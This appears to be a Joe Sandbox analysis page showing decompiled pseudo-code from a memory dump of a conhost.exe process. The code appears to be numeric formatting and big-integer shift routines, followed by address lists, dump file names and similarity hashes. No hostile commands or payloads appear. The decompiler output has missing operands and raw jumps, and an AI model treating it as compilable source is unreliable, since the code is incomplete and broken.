				 *(_t1032 + 0x30) = _t1017;
				if (r9d == 0) goto 0x7eed5124;
				if ( *((intOrPtr*)(_t1096 + 0x14)) - 1 <= 0) goto 0x7eed52a2;
				if ( *(_t1032 + 0x38) == 2) goto 0x7eed516b;
				goto 0x7eed4f9a;
				 *(_t1079 - 1) = dil;
				r8d = 0;
				E00007FF67FF67EED5730(0xa, _t704, _t888, _t879);
				_t1068 =  ==  ? _t888 : _t1067;
				r8d = 0;
				E00007FF67FF67EED5730(0xa, _t704, _t888, _t1096);
				_t1058 = _t888;
				E00007FF67FF67EED3B60(_t888, _t888, _t1029, _t1037);
				_t338 = _t888 + 0x30; // 0x30
				_t1002 = _t1058;
				if (E00007FF67FF67EED5BD0(_t1067 - _t879, _t1029, _t1002) > 0) goto 0x7eed4f51;
				 *(_t1032 + 0x30) = _t1079;
				if (_t338 == 0x39) goto 0x7eed517c;
				_t1081 =  ==  ? _t888 : _t1067;
				_t1069 = _t1058;
				r8d = 0x20;
				_t889 =  *(_t1032 + 0x30);
				 *_t889 = dil;
				goto 0x7eed49f0;
				 *(_t1032 + 0x7c) = 0;
				_t698 =  *(_t1032 + 0x48) -  *(_t1032 + 0x30);
				goto 0x7eed43bc;
				if ( *(_t1032 + 0x30) == 0) goto 0x7eed4667;
				r10d =  *(_t1032 + 0x6c);
				if (r10d <= 0) goto 0x7eed46bd;
				asm("movsd xmm3, [0xb113]");
				r11d = 0xffffffff;
				asm("movsd xmm1, [0xb10d]");
				asm("mulsd xmm0, xmm3");
				asm("mulsd xmm1, xmm0");
				asm("addsd xmm1, [0xb105]");
				asm("dec ax");
				asm("dec ax");
				_t890 = _t889 | _t1002 >> 0x00000020 << 0x00000020;
				goto 0x7eed418c;
				E00007FF67FF67EED55C0( *((intOrPtr*)(_t1069 + 8)), _t890);
				_t347 = _t1069 + 0x10; // 0x10
				_t918 = _t890;
				_t891 =  *((intOrPtr*)(_t1069 + 0x14));
				memcpy(??, ??, ??);
				E00007FF67FF67EED5AE0(1, _t891, _t918, _t347);
				_t1059 = _t891;
				goto 0x7eed485b;
				if ( *((intOrPtr*)(_t918 + 4)) + 1 -  *(_t1032 + 0xe8) >= 0) goto 0x7eed4498;
				 *(_t1032 + 0x48) =  *(_t1032 + 0x48) + 1;
				r9d = r9d + 1;
				 *(_t1032 + 0x58) = 1;
				goto 0x7eed4498;
				 *(_t1032 + 0x2c) = 2;
				r13d = 0;
				goto 0x7eed4563;
				 *(_t1032 + 0x30) =  *((intOrPtr*)(_t1032 + 0xf8));
				if (_t698 == 0x39) goto 0x7eed517c;
				_t893 =  *(_t1032 + 0x30);
				r8d = 0x20;
				 *_t893 = dil;
				goto 0x7eed49f0;
				_t1020 =  *((intOrPtr*)(_t1032 + 0xf8));
				goto 0x7eed4b4c;
				if ( *(_t1032 + 0xe8) -  *((intOrPtr*)(_t918 + 4)) + 1 <= 0) goto 0x7eed47fb;
				goto 0x7eed509a;
				if (r8d <= 0) goto 0x7eed5160;
				E00007FF67FF67EED5AE0(1, _t893, _t888, _t347);
				_t1098 = _t893;
				if (E00007FF67FF67EED5BD0(r8d, _t893, _t1029) <= 0) goto 0x7eed52f1;
				if (_t698 + 1 == 0x39) goto 0x7eed517c;
				 *(_t1032 + 0x38) = 0x20;
				if (_t1098[5] - 1 <= 0) goto 0x7eed52cf;
				r8d = 0x10;
				goto 0x7eed4fc9;
				_t973 =  *(_t1032 + 0x40);
				 *( *(_t1032 + 0x30)) = 0x39;
				goto 0x7eed4cf0;
				 *(_t1032 + 0x54) = _t574;
				 *(_t1032 + 0x30) =  *(_t1032 + 0x6c);
				goto 0x7eed4521;
				 *(_t1032 + 0x40) = _t918;
				goto 0x7eed4593;
				_t375 = _t1050 + 1; // 0x1
				_t557 = _t375;
				 *(_t1032 + 0x2c) = _t557;
				_t896 =  *(_t1032 + 0x40);
				goto 0x7eed51dc;
				if (_t973 == _t896) goto 0x7eed51fa;
				_t668 =  *(_t973 - 1) & 0x000000ff;
				_t1040 = _t973;
				_t842 = _t668 - 0x39;
				if (_t842 == 0) goto 0x7eed51d0;
				 *(_t1032 + 0x40) = _t1040;
				 *((char*)(_t1040 - 1)) = _t668 + 1;
				r8d = 0x20;
				goto 0x7eed45af;
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x2c) + 1;
				 *_t896 = 0x30;
				 *(_t1032 + 0x40) = _t1040;
				goto 0x7eed51ed;
				asm("addsd xmm0, xmm0");
				asm("comisd xmm0, xmm2");
				if (_t842 > 0) goto 0x7eed52c5;
				asm("ucomisd xmm0, xmm2");
				if (_t842 != 0) goto 0x7eed5321;
				if (_t842 != 0) goto 0x7eed5321;
				if ((_t557 & 0x00000001) != 0) goto 0x7eed51dc;
				r8d = 0x10;
				goto 0x7eed4ef3;
				_t388 = _t1050 + 1; // 0x1
				 *(_t1032 + 0x2c) = _t388;
				goto 0x7eed51dc;
				r8d = 0;
				_t976 = _t1059;
				E00007FF67FF67EED5730(0xa, _t704,  *(_t1032 + 0x40), _t976);
				if (r14b != 0) goto 0x7eed5199;
				 *(_t1032 + 0x2c) =  *(_t1032 + 0x54);
				 *(_t1032 + 0x30) =  *(_t1032 + 0x6c);
				goto 0x7eed4837;
				goto 0x7eed51dc;
				if (_t1098[6] != 0) goto 0x7eed4f3f;
				if (r8d > 0) goto 0x7eed5129;
				r8d = 0;
				goto 0x7eed4fc9;
				goto 0x7eed51dc;
				_t675 = _t1098[6];
				r8d =  *(_t1032 + 0x38);
				_t847 = _t675;
				if (_t847 == 0) goto 0x7eed4fc9;
				r8d = 0x10;
				goto 0x7eed4fc9;
				if (_t847 != 0) goto 0x7eed52fd;
				_t848 = dil & 0x00000001;
				if (_t848 != 0) goto 0x7eed514c;
				 *(_t1032 + 0x38) = 0x20;
				goto 0x7eed5160;
				if (_t848 == 0) goto 0x7eed4c97;
				goto 0x7eed4c2d;
				r8d = 0;
				goto 0x7eed4ef3;
				r8d = 0x10;
				goto 0x7eed4ef3;
				if (_t1098[5] - 1 <= 0) goto 0x7eed5359;
				r8d = 0x10;
				goto 0x7eed49e0;
				_t407 = _t1050 + 1; // 0x1
				 *(_t1032 + 0x2c) = _t407;
				goto 0x7eed51dc;
				r8d =  !=  ? 0x10 : r8d;
				goto 0x7eed49e0;
				r8d = 0x10;
				goto 0x7eed488e;
				_push(_t1059);
				_push(_t1029);
				_push(_t1012);
				_push(_t1020);
				_push(_t918);
				_t1051 =  *((intOrPtr*)(_t976 + 0x14));
				_t919 = _t976;
				_t719 = _t675 >> 5;
				_t852 = r11d - _t719;
				if (_t852 <= 0) goto 0x7eed5410;
				_t411 = _t976 + 0x18; // 0x18
				_t1060 = _t411;
				_t1030 = _t719;
				_t676 = _t675 & 0x0000001f;
				_t1049 = _t1060 + _t1051 * 4;
				_t1021 = _t1060 + _t1030 * 4;
				if (_t852 == 0) goto 0x7eed5425;
				_t1043 =  &(_t1021[1]);
				r9d =  *_t1021 >> _t676;
				if (_t1049 - _t1043 <= 0) goto 0x7eed5452;
				_t1044 =  &(_t1043[1]);
				_t569 =  *_t1043 << 0x00000020 - _t676 | r9d;
				 *(_t1060 + 4 - 4) = _t569;
				r9d =  *(_t1044 - 4);
				r9d = r9d >> _t676;
				if (_t1049 - _t1044 > 0) goto 0x7eed53d0;
				_t420 = (_t1051 - _t1030) * 4; // 0x14
				 *(_t1060 + _t420 - 4) = r9d;
				if (r9d == 0) goto 0x7eed543d;
				goto 0x7eed543d;
				 *(_t919 + 0x14) = 0;
				 *(_t919 + 0x18) = 0;
				return _t569;
			}

0x7ff67eed3df0
0x7ff67eed3df7
0x7ff67eed3e07
0x7ff67eed3e09
0x7ff67eed3e0e
0x7ff67eed3e16
0x7ff67eed3e1c
0x7ff67eed3e1c
0x7ff67eed3e25
0x7ff67eed3e32
0x7ff67eed3e36
0x7ff67eed3e3d
0x7ff67eed3e40
0x7ff67eed3e45
0x7ff67eed3e51
0x7ff67eed3e53
0x7ff67eed3e5a
0x7ff67eed3e5d
0x7ff67eed3e66
0x7ff67eed3e66
0x7ff67eed3e6c
0x7ff67eed3e71
0x7ff67eed3e78
0x7ff67eed3e7e
0x7ff67eed3e84
0x7ff67eed3e8a
0x7ff67eed3e8f
0x7ff67eed3e99
0x7ff67eed3e9d
0x7ff67eed3ea9
0x7ff67eed3eaf
0x7ff67eed3eb7
0x7ff67eed3ebc
0x7ff67eed3ec0
0x7ff67eed3ec0
0x7ff67eed3ec4
0x7ff67eed3ec9
0x7ff67eed3ece
0x7ff67eed3ed2
0x7ff67eed3ed8
0x7ff67eed3edd
0x7ff67eed3ee4
0x7ff67eed3eec
0x7ff67eed3ef6
0x7ff67eed3f07
0x7ff67eed3f0c
0x7ff67eed3f10
0x7ff67eed3f18
0x7ff67eed3f20
0x7ff67eed3f26
0x7ff67eed3f30
0x7ff67eed3f34
0x7ff67eed3f36
0x7ff67eed3f3a
0x7ff67eed3f3e
0x7ff67eed3f46
0x7ff67eed3f4a
0x7ff67eed3f4e
0x7ff67eed3f52
0x7ff67eed3f56
0x7ff67eed3f5a
0x7ff67eed3f63
0x7ff67eed3f70
0x7ff67eed3f74
0x7ff67eed3f7d
0x7ff67eed3f81
0x7ff67eed3f84
0x7ff67eed3f89
0x7ff67eed3f89
0x7ff67eed3f8d
0x7ff67eed3f8f
0x7ff67eed3f99
0x7ff67eed3f9e
0x7ff67eed3fa4
0x7ff67eed3fa8
0x7ff67eed3fae
0x7ff67eed3fb2
0x7ff67eed3fba
0x7ff67eed3fbf
0x7ff67eed3fc1
0x7ff67eed3fc9
0x7ff67eed3fd5
0x7ff67eed3fda
0x7ff67eed3fde
0x7ff67eed3fe6
0x7ff67eed3fe9
0x7ff67eed3fec
0x7ff67eed3ff1
0x7ff67eed3ffc
0x7ff67eed4004
0x7ff67eed4010
0x7ff67eed4016
0x7ff67eed401a
0x7ff67eed4022
0x7ff67eed4028
0x7ff67eed402e
0x7ff67eed403a
0x7ff67eed4048
0x7ff67eed405a
0x7ff67eed405e
0x7ff67eed4066
0x7ff67eed406c
0x7ff67eed407a
0x7ff67eed4080
0x7ff67eed4088
0x7ff67eed4098
0x7ff67eed40a0
0x7ff67eed40a9
0x7ff67eed40ad
0x7ff67eed40b1
0x7ff67eed40b5
0x7ff67eed40ba
0x7ff67eed40c4
0x7ff67eed40c9
0x7ff67eed40d9
0x7ff67eed40dd
0x7ff67eed40df
0x7ff67eed40ea
0x7ff67eed40ed
0x7ff67eed40f3
0x7ff67eed40f7
0x7ff67eed4104
0x7ff67eed4108
0x7ff67eed410b
0x7ff67eed4111
0x7ff67eed4116
0x7ff67eed411b
0x7ff67eed4121
0x7ff67eed4126
0x7ff67eed412e
0x7ff67eed4134
0x7ff67eed4137
0x7ff67eed4139
0x7ff67eed4141
0x7ff67eed4145
0x7ff67eed414b
0x7ff67eed414f
0x7ff67eed4153
0x7ff67eed415b
0x7ff67eed4160
0x7ff67eed4175
0x7ff67eed417e
0x7ff67eed4184
0x7ff67eed4189
0x7ff67eed418c
0x7ff67eed4191
0x7ff67eed41a3
0x7ff67eed41a6
0x7ff67eed41ab
0x7ff67eed41b1
0x7ff67eed41b5
0x7ff67eed41bd
0x7ff67eed41c2
0x7ff67eed41c6
0x7ff67eed41cd
0x7ff67eed41d0
0x7ff67eed41d4
0x7ff67eed41d8
0x7ff67eed41dc
0x7ff67eed41e0
0x7ff67eed41e4
0x7ff67eed41ea
0x7ff67eed41f2
0x7ff67eed41f6
0x7ff67eed41fa
0x7ff67eed41fe
0x7ff67eed4208
0x7ff67eed420b
0x7ff67eed420e
0x7ff67eed4212
0x7ff67eed4218
0x7ff67eed4220
0x7ff67eed4222
0x7ff67eed4226
0x7ff67eed422a
0x7ff67eed422e
0x7ff67eed4238
0x7ff67eed423b
0x7ff67eed423e
0x7ff67eed4242
0x7ff67eed4248
0x7ff67eed424c
0x7ff67eed4250
0x7ff67eed4254
0x7ff67eed4258
0x7ff67eed425c
0x7ff67eed4263
0x7ff67eed4266
0x7ff67eed426a
0x7ff67eed426e
0x7ff67eed4270
0x7ff67eed4274
0x7ff67eed4278
0x7ff67eed427c
0x7ff67eed4281
0x7ff67eed4286
0x7ff67eed4288
0x7ff67eed428e
0x7ff67eed4294
0x7ff67eed42a0
0x7ff67eed42a3
0x7ff67eed42ab
0x7ff67eed42b3
0x7ff67eed42b9
0x7ff67eed42bd
0x7ff67eed42c5
0x7ff67eed42c8
0x7ff67eed42cc
0x7ff67eed42d1
0x7ff67eed42dc
0x7ff67eed42e0
0x7ff67eed42e4
0x7ff67eed42e9
0x7ff67eed42f1
0x7ff67eed42f8
0x7ff67eed42fc
0x7ff67eed4301
0x7ff67eed4306
0x7ff67eed4311
0x7ff67eed4315
0x7ff67eed431e
0x7ff67eed432b
0x7ff67eed4331
0x7ff67eed4341
0x7ff67eed4345
0x7ff67eed4350
0x7ff67eed4359
0x7ff67eed435e
0x7ff67eed4362
0x7ff67eed4364
0x7ff67eed4377
0x7ff67eed437d
0x7ff67eed4380
0x7ff67eed438c
0x7ff67eed4391
0x7ff67eed439f
0x7ff67eed43a3
0x7ff67eed43a9
0x7ff67eed43ad
0x7ff67eed43b6
0x7ff67eed43b8
0x7ff67eed43c1
0x7ff67eed43c6
0x7ff67eed43cb
0x7ff67eed43d0
0x7ff67eed43dd
0x7ff67eed43e2
0x7ff67eed43ea
0x7ff67eed43ed
0x7ff67eed43f1
0x7ff67eed43f7
0x7ff67eed4400
0x7ff67eed4408
0x7ff67eed440e
0x7ff67eed4410
0x7ff67eed4417
0x7ff67eed441c
0x7ff67eed442a
0x7ff67eed4432
0x7ff67eed4435
0x7ff67eed443a
0x7ff67eed4448
0x7ff67eed4453
0x7ff67eed4458
0x7ff67eed4465
0x7ff67eed4474
0x7ff67eed447c
0x7ff67eed4481
0x7ff67eed448a
0x7ff67eed4492
0x7ff67eed449c
0x7ff67eed44a4
0x7ff67eed44ae
0x7ff67eed44b1
0x7ff67eed44b5
0x7ff67eed44b9
0x7ff67eed44c6
0x7ff67eed44cb
0x7ff67eed44d0
0x7ff67eed44d5
0x7ff67eed44e7
0x7ff67eed44ec
0x7ff67eed4500
0x7ff67eed4506
0x7ff67eed4512
0x7ff67eed451b
0x7ff67eed4521
0x7ff67eed4527
0x7ff67eed452d
0x7ff67eed4538
0x7ff67eed4540
0x7ff67eed454d
0x7ff67eed455a
0x7ff67eed455e
0x7ff67eed4563
0x7ff67eed4569
0x7ff67eed456c
0x7ff67eed4575
0x7ff67eed457a
0x7ff67eed457f
0x7ff67eed4587
0x7ff67eed4591
0x7ff67eed459b
0x7ff67eed45a0
0x7ff67eed45a5
0x7ff67eed45b7
0x7ff67eed45bc
0x7ff67eed45c9
0x7ff67eed45d2
0x7ff67eed45db
0x7ff67eed45e0
0x7ff67eed45e3
0x7ff67eed45ea
0x7ff67eed45ec
0x7ff67eed45f4
0x7ff67eed45f7
0x7ff67eed45fa
0x7ff67eed4605
0x7ff67eed460a
0x7ff67eed460e
0x7ff67eed4613
0x7ff67eed4617
0x7ff67eed461b
0x7ff67eed461f
0x7ff67eed4621
0x7ff67eed4627
0x7ff67eed462c
0x7ff67eed4631
0x7ff67eed463b
0x7ff67eed4647
0x7ff67eed464f
0x7ff67eed4653
0x7ff67eed4657
0x7ff67eed4662
0x7ff67eed4667
0x7ff67eed466b
0x7ff67eed466f
0x7ff67eed4677
0x7ff67eed467c
0x7ff67eed4694
0x7ff67eed469c
0x7ff67eed46a1
0x7ff67eed46a5
0x7ff67eed46ab
0x7ff67eed46b3
0x7ff67eed46b7
0x7ff67eed46bd
0x7ff67eed46c8
0x7ff67eed46d5
0x7ff67eed46db
0x7ff67eed46e5
0x7ff67eed46f2
0x7ff67eed46f7
0x7ff67eed4701
0x7ff67eed4703
0x7ff67eed4709
0x7ff67eed470f
0x7ff67eed4717
0x7ff67eed471d
0x7ff67eed472d
0x7ff67eed4730
0x7ff67eed4734
0x7ff67eed4748
0x7ff67eed474e
0x7ff67eed4756
0x7ff67eed4768
0x7ff67eed476e
0x7ff67eed477a
0x7ff67eed4781
0x7ff67eed4785
0x7ff67eed478a
0x7ff67eed478e
0x7ff67eed4794
0x7ff67eed479a
0x7ff67eed47a6
0x7ff67eed47b0
0x7ff67eed47b7
0x7ff67eed47c2
0x7ff67eed47cc
0x7ff67eed47d4
0x7ff67eed47d8
0x7ff67eed47dd
0x7ff67eed47e5
0x7ff67eed47ed
0x7ff67eed47f2
0x7ff67eed47f5
0x7ff67eed47fb
0x7ff67eed480b
0x7ff67eed4811
0x7ff67eed4815
0x7ff67eed481a
0x7ff67eed482d
0x7ff67eed4831
0x7ff67eed483d
0x7ff67eed4842
0x7ff67eed4847
0x7ff67eed484a
0x7ff67eed4855
0x7ff67eed4860
0x7ff67eed4868
0x7ff67eed4873
0x7ff67eed4883
0x7ff67eed4888
0x7ff67eed488e
0x7ff67eed4891
0x7ff67eed4897
0x7ff67eed489f
0x7ff67eed48a1
0x7ff67eed48ac
0x7ff67eed48b2
0x7ff67eed48b9
0x7ff67eed48c0
0x7ff67eed48c6
0x7ff67eed48d2
0x7ff67eed48d8
0x7ff67eed48e3
0x7ff67eed48e8
0x7ff67eed48f9
0x7ff67eed48ff
0x7ff67eed4907
0x7ff67eed490f
0x7ff67eed4912
0x7ff67eed4917
0x7ff67eed491a
0x7ff67eed491f
0x7ff67eed4928
0x7ff67eed4933
0x7ff67eed4943
0x7ff67eed4946
0x7ff67eed494b
0x7ff67eed494f
0x7ff67eed4952
0x7ff67eed495e
0x7ff67eed496d
0x7ff67eed4974
0x7ff67eed497d
0x7ff67eed4980
0x7ff67eed4988
0x7ff67eed4998
0x7ff67eed49a3
0x7ff67eed49af
0x7ff67eed49b3
0x7ff67eed49bc
0x7ff67eed49c4
0x7ff67eed49cd
0x7ff67eed49d7
0x7ff67eed49e5
0x7ff67eed49e8
0x7ff67eed49eb
0x7ff67eed49f3
0x7ff67eed49f8
0x7ff67eed4a00
0x7ff67eed4a05
0x7ff67eed4a0e
0x7ff67eed4a17
0x7ff67eed4a20
0x7ff67eed4a25
0x7ff67eed4a2a
0x7ff67eed4a2f
0x7ff67eed4a34
0x7ff67eed4a40
0x7ff67eed4a45
0x7ff67eed4a4b
0x7ff67eed4a58
0x7ff67eed4a6b
0x7ff67eed4a75
0x7ff67eed4a7b
0x7ff67eed4a85
0x7ff67eed4a89
0x7ff67eed4a90
0x7ff67eed4a94
0x7ff67eed4aad
0x7ff67eed4ab7
0x7ff67eed4ac5
0x7ff67eed4ad6
0x7ff67eed4adf
0x7ff67eed4ae8
0x7ff67eed4af2
0x7ff67eed4afa
0x7ff67eed4b00
0x7ff67eed4b0d
0x7ff67eed4b12
0x7ff67eed4b17
0x7ff67eed4b1f
0x7ff67eed4b24
0x7ff67eed4b29
0x7ff67eed4b32
0x7ff67eed4b37
0x7ff67eed4b3b
0x7ff67eed4b3e
0x7ff67eed4b47
0x7ff67eed4b49
0x7ff67eed4b4c
0x7ff67eed4b52
0x7ff67eed4b63
0x7ff67eed4b6c
0x7ff67eed4b78
0x7ff67eed4b7e
0x7ff67eed4b81
0x7ff67eed4b8e
0x7ff67eed4b91
0x7ff67eed4b93
0x7ff67eed4ba0
0x7ff67eed4ba8
0x7ff67eed4bb0
0x7ff67eed4bbd
0x7ff67eed4bc2
0x7ff67eed4bc7
0x7ff67eed4bcf
0x7ff67eed4bd6
0x7ff67eed4be0
0x7ff67eed4be6
0x7ff67eed4bf2
0x7ff67eed4bf6
0x7ff67eed4bfb
0x7ff67eed4c06
0x7ff67eed4c0a
0x7ff67eed4c0e
0x7ff67eed4c12
0x7ff67eed4c19
0x7ff67eed4c1b
0x7ff67eed4c1f
0x7ff67eed4c23
0x7ff67eed4c27
0x7ff67eed4c31
0x7ff67eed4c39
0x7ff67eed4c3f
0x7ff67eed4c47
0x7ff67eed4c50
0x7ff67eed4c54
0x7ff67eed4c57
0x7ff67eed4c5d
0x7ff67eed4c64
0x7ff67eed4c68
0x7ff67eed4c6c
0x7ff67eed4c70
0x7ff67eed4c74
0x7ff67eed4c78
0x7ff67eed4c7c
0x7ff67eed4c83
0x7ff67eed4c87
0x7ff67eed4c8b
0x7ff67eed4c8f
0x7ff67eed4c93
0x7ff67eed4c95
0x7ff67eed4c97
0x7ff67eed4c9c
0x7ff67eed4ca1
0x7ff67eed4ca4
0x7ff67eed4cb7
0x7ff67eed4cbc
0x7ff67eed4cc1
0x7ff67eed4cc9
0x7ff67eed4cd5
0x7ff67eed4cd7
0x7ff67eed4ce3
0x7ff67eed4ce9
0x7ff67eed4ced
0x7ff67eed4cf7
0x7ff67eed4cfc
0x7ff67eed4d02
0x7ff67eed4d04
0x7ff67eed4d12
0x7ff67eed4d1d
0x7ff67eed4d22
0x7ff67eed4d2d
0x7ff67eed4d31
0x7ff67eed4d35
0x7ff67eed4d44
0x7ff67eed4d4f
0x7ff67eed4d53
0x7ff67eed4d65
0x7ff67eed4d6a
0x7ff67eed4d73
0x7ff67eed4d78
0x7ff67eed4d7d
0x7ff67eed4d85
0x7ff67eed4d92
0x7ff67eed4d96
0x7ff67eed4d9a
0x7ff67eed4d9f
0x7ff67eed4da4
0x7ff67eed4daa
0x7ff67eed4daf
0x7ff67eed4db2
0x7ff67eed4dbf
0x7ff67eed4dca
0x7ff67eed4dd6
0x7ff67eed4dd8
0x7ff67eed4dde
0x7ff67eed4de3
0x7ff67eed4de9
0x7ff67eed4df0
0x7ff67eed4df6
0x7ff67eed4e01
0x7ff67eed4e04
0x7ff67eed4e07
0x7ff67eed4e0b
0x7ff67eed4e10
0x7ff67eed4e16
0x7ff67eed4e1f
0x7ff67eed4e2a
0x7ff67eed4e2f
0x7ff67eed4e34
0x7ff67eed4e38
0x7ff67eed4e41
0x7ff67eed4e44
0x7ff67eed4e4c
0x7ff67eed4e54
0x7ff67eed4e56
0x7ff67eed4e60
0x7ff67eed4e67
0x7ff67eed4e6a
0x7ff67eed4e6e
0x7ff67eed4e74
0x7ff67eed4e76
0x7ff67eed4e7a
0x7ff67eed4e7e
0x7ff67eed4e81
0x7ff67eed4e8c
0x7ff67eed4e96
0x7ff67eed4e98
0x7ff67eed4e9d
0x7ff67eed4e9f
0x7ff67eed4ea3
0x7ff67eed4eab
0x7ff67eed4eaf
0x7ff67eed4eb3
0x7ff67eed4eb7
0x7ff67eed4ebd
0x7ff67eed4ec1
0x7ff67eed4ec5
0x7ff67eed4ecb
0x7ff67eed4ed7
0x7ff67eed4ed9
0x7ff67eed4edf
0x7ff67eed4ee3
0x7ff67eed4ee9
0x7ff67eed4ef0
0x7ff67eed4efb
0x7ff67eed4efd
0x7ff67eed4f02
0x7ff67eed4f06
0x7ff67eed4f0b
0x7ff67eed4f10
0x7ff67eed4f13
0x7ff67eed4f17
0x7ff67eed4f1b
0x7ff67eed4f2e
0x7ff67eed4f39
0x7ff67eed4f44
0x7ff67eed4f4f
0x7ff67eed4f51
0x7ff67eed4f55
0x7ff67eed4f60
0x7ff67eed4f70
0x7ff67eed4f74
0x7ff67eed4f7a
0x7ff67eed4f82
0x7ff67eed4f8e
0x7ff67eed4f97
0x7ff67eed4f9a
0x7ff67eed4fa7
0x7ff67eed4fac
0x7ff67eed4fb4
0x7ff67eed4fba
0x7ff67eed4fc0
0x7ff67eed4fc3
0x7ff67eed4fc9
0x7ff67eed4fce
0x7ff67eed4fd1
0x7ff67eed4fda
0x7ff67eed4fe2
0x7ff67eed4fe6
0x7ff67eed4ff1
0x7ff67eed4ff7
0x7ff67eed4fff
0x7ff67eed5005
0x7ff67eed500d
0x7ff67eed5013
0x7ff67eed501b
0x7ff67eed501f
0x7ff67eed5023
0x7ff67eed502b
0x7ff67eed5030
0x7ff67eed5045
0x7ff67eed5048
0x7ff67eed5051
0x7ff67eed5056
0x7ff67eed505e
0x7ff67eed5061
0x7ff67eed506d
0x7ff67eed507a
0x7ff67eed507f
0x7ff67eed5082
0x7ff67eed5094
0x7ff67eed509a
0x7ff67eed509f
0x7ff67eed50a3
0x7ff67eed50ab
0x7ff67eed50b5
0x7ff67eed50bf
0x7ff67eed50c2
0x7ff67eed50ca
0x7ff67eed50d7
0x7ff67eed50dd
0x7ff67eed50e8
0x7ff67eed50f1
0x7ff67eed50f4
0x7ff67eed50fc
0x7ff67eed5107
0x7ff67eed5119
0x7ff67eed511f
0x7ff67eed5127
0x7ff67eed5131
0x7ff67eed513c
0x7ff67eed5146
0x7ff67eed514f
0x7ff67eed5155
0x7ff67eed5165
0x7ff67eed516e
0x7ff67eed5177
0x7ff67eed518c
0x7ff67eed5191
0x7ff67eed5194
0x7ff67eed519d
0x7ff67eed51a1
0x7ff67eed51a5
0x7ff67eed51af
0x7ff67eed51b4
0x7ff67eed51b9
0x7ff67eed51b9
0x7ff67eed51c0
0x7ff67eed51c4
0x7ff67eed51c9
0x7ff67eed51d3
0x7ff67eed51d5
0x7ff67eed51d9
0x7ff67eed51e0
0x7ff67eed51e3
0x7ff67eed51e5
0x7ff67eed51ed
0x7ff67eed51ef
0x7ff67eed51f5
0x7ff67eed51fa
0x7ff67eed51ff
0x7ff67eed520a
0x7ff67eed520f
0x7ff67eed5211
0x7ff67eed521a
0x7ff67eed521e
0x7ff67eed5224
0x7ff67eed5228
0x7ff67eed522e
0x7ff67eed523b
0x7ff67eed5240
0x7ff67eed5246
0x7ff67eed5250
0x7ff67eed5254
0x7ff67eed525d
0x7ff67eed5262
0x7ff67eed5265
0x7ff67eed526d
0x7ff67eed5278
0x7ff67eed5282
0x7ff67eed528a
0x7ff67eed528e
0x7ff67eed529d
0x7ff67eed52a8
0x7ff67eed52b1
0x7ff67eed52ba
0x7ff67eed52c0
0x7ff67eed52ca
0x7ff67eed52cf
0x7ff67eed52d9
0x7ff67eed52de
0x7ff67eed52e0
0x7ff67eed52e6
0x7ff67eed52ec
0x7ff67eed52f1
0x7ff67eed52f3
0x7ff67eed52f7
0x7ff67eed52fd
0x7ff67eed5305
0x7ff67eed530a
0x7ff67eed5310
0x7ff67eed5319
0x7ff67eed531c
0x7ff67eed5329
0x7ff67eed532f
0x7ff67eed5339
0x7ff67eed533b
0x7ff67eed5341
0x7ff67eed5346
0x7ff67eed534d
0x7ff67eed5354
0x7ff67eed5363
0x7ff67eed5367
0x7ff67eed536c
0x7ff67eed536f
0x7ff67eed5380
0x7ff67eed5382
0x7ff67eed5383
0x7ff67eed5384
0x7ff67eed5385
0x7ff67eed5386
0x7ff67eed538c
0x7ff67eed538f
0x7ff67eed5392
0x7ff67eed5395
0x7ff67eed5397
0x7ff67eed5397
0x7ff67eed539b
0x7ff67eed539e
0x7ff67eed53a1
0x7ff67eed53a5
0x7ff67eed53a9
0x7ff67eed53ad
0x7ff67eed53bf
0x7ff67eed53c2
0x7ff67eed53d9
0x7ff67eed53e1
0x7ff67eed53e4
0x7ff67eed53e7
0x7ff67eed53eb
0x7ff67eed53f1
0x7ff67eed53f9
0x7ff67eed53fe
0x7ff67eed5401
0x7ff67eed5407
0x7ff67eed5410
0x7ff67eed5417
0x7ff67eed5424

Strings

, xrefs: 00007FF67EED52FD

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 034f88f0d8f422f201d879b36f257dedbf589f31d55c70456b8b25aa6724a81b
Instruction ID: 3d82ce175961732b1d9be95ca10ffdc71682f808185941bdd92eed73360c8de4
Opcode Fuzzy Hash: 034f88f0d8f422f201d879b36f257dedbf589f31d55c70456b8b25aa6724a81b
Instruction Fuzzy Hash: 83C29837A2C6818AE761CF25A04076A77A1FBF5784F204535FA4A87B95DFBDE4488F00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EED6D90 Relevance: 1.9, APIs: 1, Instructions: 386
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF67EED6D90(signed int __eax, void* __ecx, void* __edx, void* __r8, void* __r9, intOrPtr _a40) {
				long long _v152;
				long long _v156;
				signed char _v206;
				long long _v216;
				long long _v224;
				void* _t21;
				void* _t30;

				_v156 = 0;
				_v152 = 0;
				if (__ecx != 1) goto 0x7eed6e58;
				_v224 = 0xbcd4d500 + __r8;
				r15b = 0xbcd4d500 - 1 < 0;
				_t30 = __edx - 6;
				_v206 = (__eax & 0xffffff00 | _t30 == 0x00000000) & r15b;
				if (_t30 == 0) goto 0x7eed6e78;
				_v216 =  *((intOrPtr*)(__r9 - 0x18));
				if ( *((intOrPtr*)(__r9 - 0x10)) == 0) goto 0x7eed6ff3;
				if ( *((intOrPtr*)(__r9 - 0x24)) < 0) goto 0x7eed7361;
				E00007FF67FF67EECE880(E00007FF67FF67EECE830(E00007FF67FF67EECE830((__eax & 0xffffff00 | _t30 == 0x00000000) & r15b, 0, _a40, __r9), 1, _a40,  *((intOrPtr*)(__r9 - 0x24))), _t21, _a40,  *((intOrPtr*)(__r9 - 0x10)));
